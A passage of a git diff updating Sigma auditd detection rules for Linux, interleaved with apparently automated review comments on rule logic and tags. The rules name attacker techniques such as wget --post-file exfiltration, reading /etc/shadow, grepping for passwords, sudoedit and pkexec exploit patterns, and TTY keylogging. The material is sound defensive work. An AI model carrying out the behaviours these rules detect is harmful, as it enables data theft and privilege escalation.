usage of xclip tools + - Legitimate usage of xclip tools level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml index fb68c7a65..0064fb443 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml 
@@ -1,32 +1,35 @@ title: Clipboard Collection of Image Data with Xclip Tool id: f200dc3f-b219-425d-a17e-c38467364816 -description: Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. +status: test +description: | + Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool. + Xclip has to be installed. + Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. +references: + - https://linux.die.net/man/1/xclip author: 'Pawel Mazur' -status: experimental date: 2021/10/01 -references: - - https://attack.mitre.org/techniques/T1115/ - - https://linux.die.net/man/1/xclip +modified: 2022/10/09 +tags: + - attack.collection + - attack.t1115 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: EXECVE - a0: xclip - a1: - - '-selection' - - '-sel' - a2: - - clipboard - - clip - a3: '-t' - a4|startswith: 'image/' - a5: '-o' - condition: selection -tags: - - attack.collection - - attack.t1115 + selection: + type: EXECVE + a0: xclip + a1: + - '-selection' + - '-sel' + a2: + - clipboard + - clip + a3: '-t' + a4|startswith: 'image/' + a5: '-o' + condition: selection falsepositives: - - Legitimate usage of xclip tools + - Legitimate usage of xclip tools level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_coinminer.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_coinminer.yml index 5a7ec1d7a..fd45113d6 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_coinminer.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_coinminer.yml 
@@ -1,11 +1,12 @@ title: Possible Coin Miner CPU Priority Param id: 071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed -status: experimental +status: test description: Detects command line parameter very often used with coin miners -author: Florian Roth -date: 2021/10/09 references: - https://xmrig.com/docs/miner/command-line-options +author: Florian Roth (Nextron Systems) +date: 2021/10/09 +modified: 2022/12/25 tags: - attack.privilege_escalation - attack.t1068 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_create_account.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_create_account.yml index 0cc93ec67..71a21f5b2 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_create_account.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_create_account.yml 
@@ -2,22 +2,26 @@ title: Creation Of An User Account id: 759d0d51-bc99-4b5e-9add-8f5b2c8e7512 status: test description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system. -author: Marie Euler references: - - 'MITRE Attack technique T1136; Create Account ' + - https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files + - https://access.redhat.com/articles/4409591#audit-record-types-2 + - https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07 +author: Marie Euler, Pawel Mazur date: 2020/05/18 -modified: 2021/11/27 +modified: 2022/12/20 +tags: + - attack.t1136.001 + - attack.persistence logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'SYSCALL' - exe|endswith: '/useradd' - condition: selection + selection_syscall_record_type: + type: 'SYSCALL' + exe|endswith: '/useradd' + selection_add_user_record_type: + type: 'ADD_USER' # This is logged without having to configure audit rules on both Ubuntu and Centos + condition: 1 of selection_* falsepositives: - - Admin activity + - Admin activity level: medium -tags: - - attack.t1136.001 - - attack.persistence diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml deleted file mode 100644 index d8a6328fa..000000000 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml +++ /dev/null 
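Review bot: `selection_add_user_record_type` matches every `ADD_USER` record, including refused attempts — user-account records carry a `res=success`/`res=failed` field inside `msg=` — so the rule now also fires on a denied `useradd`, which may be wanted but is not stated anywhere. Either add `res: success` to that selection (if the parser exposes the nested field) or name failed attempts in `description`/`falsepositives`. The trailing `# This is logged without having to configure audit rules on both Ubuntu and Centos` comment is the most useful deployment hint in the file; move it into `description` so it survives conversion, since backends drop YAML comments.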
@@ -1,42 +0,0 @@
-title: CVE-2021-3156 Exploitation Attempt
-id: 5ee37487-4eb8-4ac2-9be1-d7d14cdc559f
-status: experimental
-description: Detects exploitation attempt of vulnerability described in CVE-2021-3156. |
- Alternative approach might be to look for flooding of auditd logs due to bruteforcing |
- required to trigger the heap-based buffer overflow.
-author: Bhabesh Raj
-date: 2021/02/01
-modified: 2021/09/14
-references:
- - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
-tags:
- - attack.privilege_escalation
- - attack.t1068
- - cve.2021.3156
-logsource:
- product: linux
- service: auditd
-detection:
- selection:
- type: 'EXECVE'
- a0: '/usr/bin/sudoedit'
- cmd1:
- a1: '-s'
- cmd2:
- a2: '-s'
- cmd3:
- a3: '-s'
- cmd4:
- a4: '-s'
- cmd5:
- a1: '\'
- cmd6:
- a2: '\'
- cmd7:
- a3: '\'
- cmd8:
- a4: '\'
- condition: selection and (cmd1 or cmd2 or cmd3 or cmd4) and (cmd5 or cmd6 or cmd7 or cmd8)
-falsepositives:
- - Unknown
-level: high
diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml
deleted file mode 100644
index 64268f9b0..000000000
--- a/src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml
+++ /dev/null
@@ -1,29 +0,0 @@
-title: CVE-2021-3156 Exploitation Attempt
-id: b9748c98-9ea7-4fdb-80b6-29bed6ba71d2
-related:
- - id: 5ee37487-4eb8-4ac2-9be1-d7d14cdc559f
- type: derived
-status: experimental
-description: Detects exploitation attempt of vulnerability described in CVE-2021-3156. |
- Alternative approach might be to look for flooding of auditd logs due to bruteforcing |
- required to trigger the heap-based buffer overflow.
-author: Bhabesh Raj
-date: 2021/02/01
-modified: 2021/09/14
-references:
- - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
-tags:
- - attack.privilege_escalation
- - attack.t1068
- - cve.2021.3156
-logsource:
- product: linux
- service: auditd
-detection:
- selection:
- type: 'SYSCALL'
- exe: '/usr/bin/sudoedit'
- condition: selection
-falsepositives:
- - Unknown
-level: high
diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml
deleted file mode 100644
index df50b8d15..000000000
--- a/src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml
+++ /dev/null
@@ -1,28 +0,0 @@
-title: CVE-2021-4034 Exploitation Attempt
-id: 40a016ab-4f48-4eee-adde-bbf612695c53
-description: Detects exploitation attempt of vulnerability described in CVE-2021-4034.
-author: 'Pawel Mazur'
-status: experimental
-date: 2022/01/27
-references:
- - https://github.com/berdav/CVE-2021-4034
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034
- - https://access.redhat.com/security/cve/CVE-2021-4034
-logsource:
- product: linux
- service: auditd
-detection:
- proctitle:
- type: PROCTITLE
- proctitle: '(null)'
- syscall:
- type: SYSCALL
- comm: pkexec
- exe: '/usr/bin/pkexec'
- condition: proctitle and syscall
-tags:
- - attack.privilege_escalation
- - attack.t1068
-falsepositives:
- - Unknown
-level: high
diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_data_compressed.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_data_compressed.yml index adb8e6e0f..480b03092 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_data_compressed.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_data_compressed.yml @@ -2,30 +2,30 @@ title: Data Compressed id: a3b5e3e9-1b49-4119-8b8e-0344a01f21ee status: test description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. -author: Timur Zinniatullin, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md + - https://github.com/redcanaryco/atomic-red-team/blob/a78b9ed805ab9ea2e422e1aa7741e9407d82d7b1/atomics/T1560.001/T1560.001.md +author: Timur Zinniatullin, oscd.community date: 2019/10/21 -modified: 2021/11/27 +modified: 2023/07/28 +tags: + - attack.exfiltration + - attack.t1560.001 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection1: - type: 'execve' - a0: 'zip' - selection2: - type: 'execve' - a0: 'gzip' - a1: '-f' - selection3: - type: 'execve' - a0: 'tar' - a1|contains: '-c' - condition: 1 of selection* + selection1: + type: 'execve' + a0: 'zip' + selection2: + type: 'execve' + a0: 'gzip' + a1: '-k' + selection3: + type: 'execve' + a0: 'tar' + a1|contains: '-c' + condition: 1 of selection* falsepositives: - - Legitimate use of archiving tools by legitimate user. + - Legitimate use of archiving tools by legitimate user. level: low -tags: - - attack.exfiltration - - attack.t1560.001 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml index 77190c768..1beb9d63c 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml 
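Review bot: `type: 'execve'` is lowercase in all three re-indented selections of this hunk, while auditd emits `type=EXECVE` and every other rule in this patch matches on `'EXECVE'`; most Sigma backends compare case-insensitively, but not all do, so `type: 'EXECVE'` is the safe spelling here. The same lowercase value sits in the crond masquerading hunk later in this patch (`lnx_auditd_masquerading_crond.yml`). `a1: '-k'` also only matches when `-k` is the sole first option, so `gzip -9k file` or a bare `gzip file` never reaches `selection2`; that is worth stating in `description` if the narrow atomic-test match is deliberate.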
+++ b/src/main/resources/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml @@ -1,25 +1,27 @@ title: Data Exfiltration with Wget id: cb39d16b-b3b6-4a7a-8222-1cf24b686ffc -description: Detects attempts to post the file with the usage of wget utility. The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow. +status: test +description: | + Detects attempts to post the file with the usage of wget utility. + The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow. +references: + - https://linux.die.net/man/1/wget + - https://gtfobins.github.io/gtfobins/wget/ author: 'Pawel Mazur' -status: experimental date: 2021/11/18 -references: - - https://attack.mitre.org/tactics/TA0010/ - - https://linux.die.net/man/1/wget - - https://gtfobins.github.io/gtfobins/wget/ +modified: 2022/12/25 +tags: + - attack.exfiltration + - attack.t1048.003 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: EXECVE - a0: wget - a1|startswith: '--post-file=' - condition: selection -tags: - - attack.exfiltration - - attack.t1048.003 + selection: + type: EXECVE + a0: wget + a1|startswith: '--post-file=' + condition: selection falsepositives: - - Legitimate usage of wget utility to post a file + - Legitimate usage of wget utility to post a file level: medium diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_dd_delete_file.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_dd_delete_file.yml index ef36926e6..3cb8f77c6 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_dd_delete_file.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_dd_delete_file.yml 
@@ -2,10 +2,13 @@ title: Overwriting the File with Dev Zero or Null id: 37222991-11e9-4b6d-8bdf-60fbe48f753e status: stable description: Detects overwriting (effectively wiping/deleting) of a file. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md author: Jakob Weinzettl, oscd.community date: 2019/10/23 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md +tags: + - attack.impact + - attack.t1485 logsource: product: linux service: auditd @@ -21,7 +24,3 @@ falsepositives: - Appending null bytes to files. - Legitimate overwrite of files. level: low - -tags: - - attack.impact - - attack.t1485 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml index 30428aa01..f25bf12f5 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml 
@@ -1,27 +1,26 @@ title: Disable System Firewall id: 53059bc0-1472-438b-956a-7508a94a91f0 -status: experimental +status: test description: Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network. -author: 'Pawel Mazur' references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md - - https://attack.mitre.org/techniques/T1562/004/ - - https://firewalld.org/documentation/man-pages/firewall-cmd.html + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md + - https://firewalld.org/documentation/man-pages/firewall-cmd.html +author: 'Pawel Mazur' date: 2022/01/22 +tags: + - attack.t1562.004 + - attack.defense_evasion logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'SERVICE_STOP' - unit: - - 'firewalld' - - 'iptables' - - 'ufw' - condition: selection + selection: + type: 'SERVICE_STOP' + unit: + - 'firewalld' + - 'iptables' + - 'ufw' + condition: selection falsepositives: - - Admin activity + - Admin activity level: high -tags: - - attack.t1562.004 - - attack.defense_evasion diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml index 34b0f105a..9ba7d2e73 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml 
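Review bot: The `unit` list under `selection` lacks `nftables`, which is the default firewall service on many current distributions and the backend firewalld delegates to, so stopping it is not caught; add `- 'nftables'` to the list. `SERVICE_STOP` records also appear for every unit during an orderly shutdown or reboot, which will trip a `level: high` rule on each maintenance window — name that next to `Admin activity` under `falsepositives`, or suggest correlating with a preceding `SYSTEM_SHUTDOWN` record in `description`.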
@@ -2,24 +2,24 @@ title: File or Folder Permissions Change id: 74c01ace-0152-4094-8ae2-6fd776dd43e5 status: test description: Detects file and folder permission changes. -author: Jakob Weinzettl, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md +author: Jakob Weinzettl, oscd.community date: 2019/09/23 modified: 2021/11/27 +tags: + - attack.defense_evasion + - attack.t1222.002 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'EXECVE' - a0|contains: - - 'chmod' - - 'chown' - condition: selection + selection: + type: 'EXECVE' + a0|contains: + - 'chmod' + - 'chown' + condition: selection falsepositives: - - User interacting with files permissions (normal/daily behaviour). + - User interacting with files permissions (normal/daily behaviour). level: low -tags: - - attack.defense_evasion - - attack.t1222.002 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml index e1877ffab..67ac87b8d 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml 
@@ -1,25 +1,26 @@ -title: 'Credentials In Files' +title: Credentials In Files - Linux id: df3fcaea-2715-4214-99c5-0056ea59eb35 status: test description: 'Detecting attempts to extract passwords with grep' -author: 'Igor Fits, oscd.community' references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md +author: 'Igor Fits, oscd.community' date: 2020/10/15 -modified: 2021/11/27 +modified: 2023/04/30 +tags: + - attack.credential_access + - attack.t1552.001 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - execve: - type: 'EXECVE' - passwordgrep: - - 'grep' - - 'password' - condition: execve and all of passwordgrep + selection: + type: 'EXECVE' + keywords: + '|all': + - 'grep' + - 'password' + condition: selection and keywords falsepositives: - - Unknown + - Unknown level: high -tags: - - attack.credential_access - - attack.t1552.001 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_binary_execution.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_binary_execution.yml new file mode 100644 index 000000000..ea5f53b8d --- /dev/null +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_binary_execution.yml 
@@ -0,0 +1,31 @@
+title: Use Of Hidden Paths Or Files
+id: 9e1bef8d-0fff-46f6-8465-9aa54e128c1e
+related:
+ - id: d08722cd-3d09-449a-80b4-83ea2d9d4616
+ type: similar
+status: test
+description: Detects calls to hidden files or files located in hidden directories in NIX systems.
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md
+author: David Burkett, @signalblur
+date: 2022/12/30
+tags:
+ - attack.defense_evasion
+ - attack.t1574.001
+logsource:
+ product: linux
+ service: auditd
+detection:
+ selection:
+ type: 'PATH'
+ name|contains: '/.'
+ filter:
+ name|contains:
+ - '/.cache/'
+ - '/.config/'
+ - '/.pyenv/'
+ - '/.rustup/toolchains'
+ condition: selection and not filter
+falsepositives:
+ - Unknown
+level: low
diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml
index 16f6fc03a..b7fa13520 100644
--- a/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml
+++ b/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml
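Review bot: `attack.t1574.001` (DLL Search Order Hijacking) does not describe this rule; the only reference is the T1564.001 atomic and the `related` rule `d08722cd-…` is tagged `attack.t1564.001`, so the tag looks like a digit transposition and should read `- attack.t1564.001`. Separately, `name|contains: '/.'` also matches the relative components `/./` and `/../` in any PATH record, which on a busy host will swamp the genuine hidden-directory hits; add `- '/./'` and `- '/../'` to the `filter` list (or switch to a `name|re` anchored on `/\.[^./]`) to keep the stated intent. Dotfiles such as `/.bashrc` and `/.ssh/` are also not in `filter`, which is fine at `level: low` but deserves a line under `falsepositives` instead of `Unknown`.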
@@ -1,33 +1,33 @@ title: Hidden Files and Directories id: d08722cd-3d09-449a-80b4-83ea2d9d4616 +status: test description: Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md author: 'Pawel Mazur' -status: experimental date: 2021/09/06 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md - - https://attack.mitre.org/techniques/T1564/001/ +modified: 2022/10/09 +tags: + - attack.defense_evasion + - attack.t1564.001 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - commands: - type: EXECVE - a0: - - mkdir - - touch - - vim - - nano - - vi - arguments: - - a1|contains: '/.' - - a1|startswith: '.' - - a2|contains: '/.' - - a2|startswith: '.' - condition: commands and arguments -tags: - - attack.defense_evasion - - attack.t1564.001 + commands: + type: EXECVE + a0: + - mkdir + - touch + - vim + - nano + - vi + arguments: + - a1|contains: '/.' + - a1|startswith: '.' + - a2|contains: '/.' + - a2|startswith: '.' + condition: commands and arguments falsepositives: - - Unknown + - Unknown level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml index 673a4608f..584fbe363 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml 
@@ -1,29 +1,29 @@ title: Steganography Hide Zip Information in Picture File id: 45810b50-7edc-42ca-813b-bdac02fb946b +status: test description: Detects appending of zip file to image +references: + - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ author: 'Pawel Mazur' -status: experimental date: 2021/09/09 -references: - - https://attack.mitre.org/techniques/T1027/003/ - - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ +modified: 2022/10/09 tags: - - attack.defense_evasion - - attack.t1027.003 -falsepositives: - - Unknown -level: low + - attack.defense_evasion + - attack.t1027.003 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - commands: - type: EXECVE - a0: cat - a1: - a1|endswith: - - '.jpg' - - '.png' - a2: - a2|endswith: '.zip' - condition: commands and a1 and a2 + commands: + type: EXECVE + a0: cat + a1: + a1|endswith: + - '.jpg' + - '.png' + a2: + a2|endswith: '.zip' + condition: commands and a1 and a2 +falsepositives: + - Unknown +level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml index 4cd280f36..fdf651281 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml 
@@ -1,35 +1,33 @@ title: Linux Keylogging with Pam.d id: 49aae26c-450e-448b-911d-b3c13d178dfc +status: test description: Detect attempt to enable auditing of TTY input - # -w /etc/pam.d/ -p wa -k pam - this rule will help you detect changes to the pam.d files- https://github.com/Neo23x0/auditd/blob/master/audit.rules - # - the TTY events detection asumes that you do not expect them in your environment or add filtering on those users that you configured it for +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md + - https://linux.die.net/man/8/pam_tty_audit + - https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing + - https://access.redhat.com/articles/4409591#audit-record-types-2 author: 'Pawel Mazur' -status: experimental date: 2021/05/24 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md - - https://attack.mitre.org/techniques/T1003/ - - https://linux.die.net/man/8/pam_tty_audit - - https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing - - https://access.redhat.com/articles/4409591#audit-record-types-2 +modified: 2022/12/18 +tags: + - attack.credential_access + - attack.t1003 + - attack.t1056.001 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - path_events: - type: PATH - name: - - '/etc/pam.d/system-auth' - - '/etc/pam.d/password-auth' - tty_events: + selection_path_events: + type: PATH + name: + - '/etc/pam.d/system-auth' + - '/etc/pam.d/password-auth' + selection_tty_events: type: - - 'TTY' - - 'USER_TTY' - condition: path_events or tty_events -tags: - - attack.credential_access - - attack.t1003 - - attack.t1056.001 + - 'TTY' + - 'USER_TTY' + condition: 1 of selection_* falsepositives: - - Administrative work + - Administrative work 
level: high diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml index ffe1bd020..742164d49 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml @@ -2,23 +2,23 @@ title: Modification of ld.so.preload id: 4b3cb710-5e83-4715-8c45-8b2b5b3e5751 status: test description: Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes. -author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md - - https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md + - https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html +author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community date: 2019/10/24 modified: 2021/11/27 +tags: + - attack.defense_evasion + - attack.t1574.006 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'PATH' - name: '/etc/ld.so.preload' - condition: selection + selection: + type: 'PATH' + name: '/etc/ld.so.preload' + condition: selection falsepositives: - - Unknown + - Unknown level: high -tags: - - attack.defense_evasion - - attack.t1574.006 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_load_module_insmod.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_load_module_insmod.yml index 941c1ad1d..108f57e50 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_load_module_insmod.yml 
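Review bot: The rewrite removes the two inline `#` notes that followed the old `description` — that a watch such as `-w /etc/pam.d/ -p wa -k pam` must exist for the PATH half to fire, and that the TTY half assumes TTY auditing is not expected in the environment — and nothing on the new side carries them, so operators now get a `level: high` rule whose only guidance is `Administrative work`. Move both statements into a `description: |` block or into `falsepositives` rather than dropping them. `selection_tty_events` on its own matches every `TTY`/`USER_TTY` record, so any host where `pam_tty_audit` is legitimately enabled for administrators will alert on each flushed input buffer; that is exactly the caveat the deleted comment documented. The enclosing hunk starts on the previous line.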
+++ b/src/main/resources/rules/linux/auditd/lnx_auditd_load_module_insmod.yml @@ -1,14 +1,21 @@ title: Loading of Kernel Module via Insmod id: 106d7cbd-80ff-4985-b682-a7043e5acb72 -status: experimental -description: Detects loading of kernel modules with insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. Adversaries may use LKMs to obtain persistence within the system or elevate the privileges. -author: 'Pawel Mazur' -date: 2021/11/02 +status: test +description: | + Detects loading of kernel modules with insmod command. + Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. + Adversaries may use LKMs to obtain persistence within the system or elevate the privileges. references: - - https://attack.mitre.org/techniques/T1547/006/ - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md - https://linux.die.net/man/8/insmod - https://man7.org/linux/man-pages/man8/kmod.8.html +author: 'Pawel Mazur' +date: 2021/11/02 +modified: 2022/12/25 +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1547.006 logsource: product: linux service: auditd @@ -21,7 +28,3 @@ detection: falsepositives: - Unknown level: high -tags: - - attack.persistence - - attack.privilege_escalation - - attack.t1547.006 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_logging_config_change.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_logging_config_change.yml index 028aac4f9..db00c3f22 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_logging_config_change.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_logging_config_change.yml 
@@ -2,29 +2,29 @@ title: Logging Configuration Changes on Linux Host id: c830f15d-6f6e-430f-8074-6f73d6807841 status: test description: Detect changes of syslog daemons configuration files -author: Mikhail Larin, oscd.community references: - - self experience + - self experience +author: Mikhail Larin, oscd.community date: 2019/10/25 modified: 2021/11/27 +tags: + - attack.defense_evasion + - attack.t1562.006 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'PATH' - name: - - /etc/syslog.conf - - /etc/rsyslog.conf - - /etc/syslog-ng/syslog-ng.conf - condition: selection + selection: + type: 'PATH' + name: + - /etc/syslog.conf + - /etc/rsyslog.conf + - /etc/syslog-ng/syslog-ng.conf + condition: selection fields: - - exe - - comm - - key + - exe + - comm + - key falsepositives: - - Legitimate administrative activity + - Legitimate administrative activity level: high -tags: - - attack.defense_evasion - - attack.t1562.006 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_masquerading_crond.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_masquerading_crond.yml index ce000f173..253fa5aa5 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_masquerading_crond.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_masquerading_crond.yml 
